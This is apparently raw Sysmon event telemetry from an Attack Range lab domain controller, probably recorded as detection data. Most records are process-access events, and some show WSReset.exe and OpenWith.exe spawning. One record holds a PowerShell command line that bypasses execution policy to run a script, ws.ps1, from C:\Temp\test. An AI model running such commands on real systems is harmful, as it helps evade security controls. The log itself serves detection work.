08:08:02.274{466BC892-F862-60EB-FA7D-00000000CF01}1365944C:\Windows\system32\conhost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.242{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.238{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.238{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.238{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.238{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.237{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.237{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001054770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.220{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 
'C:\Temp\test\ws.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 10341000x80000000000000001054851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.945{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.945{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.891{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.891{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.891{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.860{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 
23542300x80000000000000001054844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FCE78667D2FF0DE1512285534BA0403F,SHA256=0B111B32D228771928E4E043E073511DEF99E4B85F5E641A543538791D1DDE14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.821{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\System32\OpenWith.exe10.0.14393.4169 (rs1_release.210107-1130)Pick an 
appMicrosoft® Windows® Operating SystemMicrosoft CorporationOpenWith.exeC:\Windows\system32\OpenWith.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=196A5E5EF42F8CADACD75FAF17E18689,SHA256=8E9759AE4C7644BC975A2A33BC9E4D17C39B4D6DAAE19F7401181C05DC9D1B90,IMPHASH=3DC53F3258E7C5C7131E7C13F7BD06C9{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x8000000000000000810417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:03.541{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A9F3F5437654BCD56816919DC20B77,SHA256=84F5D5E1D18EDD88D5CC556226012224ADD020CEC7CC39D978CC24A9355AB6F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.807{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.807{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.760{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.760{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.760{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.691{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FC7D-00000000CF01}7268C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 